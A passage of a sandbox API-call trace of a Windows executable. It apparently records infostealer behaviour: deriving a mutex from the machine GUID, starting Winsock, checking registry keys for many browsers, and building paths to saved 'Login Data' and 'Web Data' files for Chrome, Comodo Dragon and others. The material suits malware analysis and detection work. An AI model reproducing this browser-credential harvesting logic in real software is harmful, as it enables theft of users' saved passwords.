C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x74f398*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" [0231.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0231.062] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe", lpSrch="-u") returned 0x0 [0231.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0231.186] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", lpSrch="-u") returned 0x0 [0231.190] SetErrorMode (uMode=0x3) returned 0x8001 [0231.192] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x74d80000 [0231.193] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x773e0000 [0231.194] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x74ad0000 [0231.608] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fd7c | out: lpWSAData=0x19fd7c) returned 0 [0231.783] GetProcessHeap () returned 0x740000 [0231.783] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x753d60 [0231.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.784] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fedc | out: phkResult=0x19fedc*=0x178) returned 0x0 [0231.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.786] RegQueryValueExA (in: hKey=0x178, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x753d60, lpcbData=0x19fed8*=0x208 | out: lpType=0x0, lpData=0x753d60*=0x30, lpcbData=0x19fed8*=0x25) returned 0x0 [0231.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.787] RegCloseKey (hKey=0x178) returned 0x0 [0231.787] GetProcessHeap () returned 0x740000 [0231.787] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x74bad0 [0231.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.788] CryptAcquireContextW (in: phProv=0x19febc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19febc*=0x747360) returned 1 [0231.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.806] CryptCreateHash (in: hProv=0x747360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fec0 | out: phHash=0x19fec0) returned 1 [0231.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.811] CryptHashData (hHash=0x74d968, pbData=0x753d60, dwDataLen=0x24, dwFlags=0x0) returned 1 [0231.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.812] CryptGetHashParam (in: hHash=0x74d968, dwParam=0x2, pbData=0x74bad0, pdwDataLen=0x19feb8, dwFlags=0x0 | out: pbData=0x74bad0, pdwDataLen=0x19feb8) returned 1 [0231.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.813] CryptDestroyHash (hHash=0x74d968) returned 1 [0231.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0231.815] CryptReleaseContext (hProv=0x747360, dwFlags=0x0) returned 1 [0231.815] GetProcessHeap () returned 0x740000 [0231.815] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x31) returned 0x74d6a8 [0231.815] GetProcessHeap () returned 0x740000 [0231.815] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74bad0 | out: hHeap=0x740000) returned 1 [0231.816] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x74d6a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0231.816] GetProcessHeap () returned 0x740000 [0231.816] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x42) returned 0x746b30 [0231.816] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x74d6a8, cbMultiByte=-1, lpWideCharStr=0x746b30, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0231.816] GetProcessHeap () returned 0x740000 [0231.816] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x64) returned 0x7548a8 [0231.816] GetProcessHeap () returned 0x740000 [0231.817] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x746b30 | out: hHeap=0x740000) returned 1 [0231.817] GetProcessHeap () returned 0x740000 [0231.817] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d6a8 | out: hHeap=0x740000) returned 1 [0231.817] GetProcessHeap () returned 0x740000 [0231.818] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x753d60 | out: hHeap=0x740000) returned 1 [0231.818] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x180 [0231.818] GetLastError () returned 0x0 [0231.818] GetProcessHeap () returned 0x740000 [0231.818] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1388) returned 0x755058 [0231.819] GetProcessHeap () returned 0x740000 [0231.819] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74bad0 [0233.268] GetProcessHeap () returned 0x740000 [0233.268] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.269] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb98*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb98*=0x104) returned 0x2 [0233.270] GetProcessHeap () returned 0x740000 [0233.270] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.271] GetProcessHeap () returned 0x740000 [0233.271] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.272] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba8*=0x104) returned 0x2 [0233.272] GetProcessHeap () returned 0x740000 [0233.272] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.480] GetProcessHeap () returned 0x740000 [0233.480] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.482] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb9c*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb9c*=0x104) returned 0x2 [0233.482] GetProcessHeap () returned 0x740000 [0233.482] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.483] GetProcessHeap () returned 0x740000 [0233.483] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.484] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba4*=0x104) returned 0x2 [0233.484] GetProcessHeap () returned 0x740000 [0233.484] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.485] GetProcessHeap () returned 0x740000 [0233.485] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.486] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb8c*=0x104) returned 0x2 [0233.486] GetProcessHeap () returned 0x740000 [0233.486] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.486] GetProcessHeap () returned 0x740000 [0233.486] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.487] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fb8c*=0x104) returned 0x2 [0233.487] GetProcessHeap () returned 0x740000 [0233.487] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.489] GetProcessHeap () returned 0x740000 [0233.489] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x7563e8 [0233.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.492] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x7563e8, pcbData=0x19fba4*=0x104) returned 0x2 [0233.493] GetProcessHeap () returned 0x740000 [0233.493] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563e8 | out: hHeap=0x740000) returned 1 [0233.494] GetProcessHeap () returned 0x740000 [0233.494] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x753d60 [0233.498] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0233.500] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x753d60 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0233.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.505] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0233.506] GetProcessHeap () returned 0x740000 [0233.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x757bf8 [0233.507] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x757bf8, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0233.507] GetProcessHeap () returned 0x740000 [0233.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6a) returned 0x757e08 [0233.508] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.509] wvsprintfW (in: param_1=0x757e08, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19fbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0233.509] GetProcessHeap () returned 0x740000 [0233.509] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x748128 [0233.509] GetProcessHeap () returned 0x740000 [0233.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e08 | out: hHeap=0x740000) returned 1 [0233.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.510] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0233.510] GetProcessHeap () returned 0x740000 [0233.511] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x748128 | out: hHeap=0x740000) returned 1 [0233.511] GetProcessHeap () returned 0x740000 [0233.511] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757bf8 | out: hHeap=0x740000) returned 1 [0233.511] GetProcessHeap () returned 0x740000 [0233.511] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3fcc) returned 0x757bf8 [0233.512] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.512] wvsprintfW (in: param_1=0x757bf8, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19fbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0233.513] GetProcessHeap () returned 0x740000 [0233.513] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb8) returned 0x75bbd0 [0233.513] GetProcessHeap () returned 0x740000 [0233.513] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757bf8 | out: hHeap=0x740000) returned 1 [0233.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.514] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0233.514] GetProcessHeap () returned 0x740000 [0233.515] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bbd0 | out: hHeap=0x740000) returned 1 [0233.849] GetProcessHeap () returned 0x740000 [0233.849] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x757bf8 [0233.857] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0233.858] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x757bf8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0233.975] GetProcessHeap () returned 0x740000 [0233.975] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0233.976] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.977] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0233.977] GetProcessHeap () returned 0x740000 [0233.977] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74aa40 [0233.977] GetProcessHeap () returned 0x740000 [0233.977] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0233.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.978] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0233.979] GetProcessHeap () returned 0x740000 [0233.979] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74aa40 | out: hHeap=0x740000) returned 1 [0233.979] GetProcessHeap () returned 0x740000 [0233.979] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0233.980] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.980] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0233.981] GetProcessHeap () returned 0x740000 [0233.981] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74b418 [0233.981] GetProcessHeap () returned 0x740000 [0233.981] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0233.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.982] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0233.982] GetProcessHeap () returned 0x740000 [0233.982] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b418 | out: hHeap=0x740000) returned 1 [0233.983] GetProcessHeap () returned 0x740000 [0233.983] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0233.984] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.985] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0233.985] GetProcessHeap () returned 0x740000 [0233.985] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdc8 [0233.985] GetProcessHeap () returned 0x740000 [0233.985] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0233.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.987] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0233.987] GetProcessHeap () returned 0x740000 [0233.987] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0233.987] GetProcessHeap () returned 0x740000 [0233.988] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0233.988] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.989] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0233.989] GetProcessHeap () returned 0x740000 [0233.989] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8a) returned 0x75bdd8 [0233.989] GetProcessHeap () returned 0x740000 [0233.990] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0233.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0233.991] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0233.991] GetProcessHeap () returned 0x740000 [0233.996] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0233.998] GetProcessHeap () returned 0x740000 [0233.998] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0233.999] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0233.999] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0233.999] GetProcessHeap () returned 0x740000 [0234.000] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb2) returned 0x75bdf0 [0234.000] GetProcessHeap () returned 0x740000 [0234.000] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.001] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0234.001] GetProcessHeap () returned 0x740000 [0234.002] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.002] GetProcessHeap () returned 0x740000 [0234.002] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.002] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.003] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0234.003] GetProcessHeap () returned 0x740000 [0234.003] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xae) returned 0x75bde8 [0234.003] GetProcessHeap () returned 0x740000 [0234.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.005] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0234.005] GetProcessHeap () returned 0x740000 [0234.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.006] GetProcessHeap () returned 0x740000 [0234.006] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.007] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.008] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0234.008] GetProcessHeap () returned 0x740000 [0234.008] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8c) returned 0x75bdc8 [0234.008] GetProcessHeap () returned 0x740000 [0234.008] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.009] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0234.010] GetProcessHeap () returned 0x740000 [0234.010] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.010] GetProcessHeap () returned 0x740000 [0234.010] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.011] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.116] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0234.116] GetProcessHeap () returned 0x740000 [0234.116] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74aa40 [0234.116] GetProcessHeap () returned 0x740000 [0234.117] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.118] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0234.118] GetProcessHeap () returned 0x740000 [0234.119] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74aa40 | out: hHeap=0x740000) returned 1 [0234.119] GetProcessHeap () returned 0x740000 [0234.119] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.146] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.146] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0234.147] GetProcessHeap () returned 0x740000 [0234.147] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74ac38 [0234.147] GetProcessHeap () returned 0x740000 [0234.147] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.148] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0234.149] GetProcessHeap () returned 0x740000 [0234.149] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ac38 | out: hHeap=0x740000) returned 1 [0234.149] GetProcessHeap () returned 0x740000 [0234.149] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.150] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.151] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0234.151] GetProcessHeap () returned 0x740000 [0234.151] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74ace0 [0234.151] GetProcessHeap () returned 0x740000 [0234.151] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.155] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0234.155] GetProcessHeap () returned 0x740000 [0234.156] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ace0 | out: hHeap=0x740000) returned 1 [0234.156] GetProcessHeap () returned 0x740000 [0234.156] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.157] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.158] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0234.158] GetProcessHeap () returned 0x740000 [0234.158] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdc8 [0234.158] GetProcessHeap () returned 0x740000 [0234.159] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.159] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0234.160] GetProcessHeap () returned 0x740000 [0234.160] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.160] GetProcessHeap () returned 0x740000 [0234.160] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.161] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.161] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0234.162] GetProcessHeap () returned 0x740000 [0234.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8a) returned 0x75bdd8 [0234.162] GetProcessHeap () returned 0x740000 [0234.162] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.163] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0234.163] GetProcessHeap () returned 0x740000 [0234.163] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.163] GetProcessHeap () returned 0x740000 [0234.163] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.164] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.165] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0234.165] GetProcessHeap () returned 0x740000 [0234.165] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x96) returned 0x75bdf0 [0234.165] GetProcessHeap () returned 0x740000 [0234.165] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 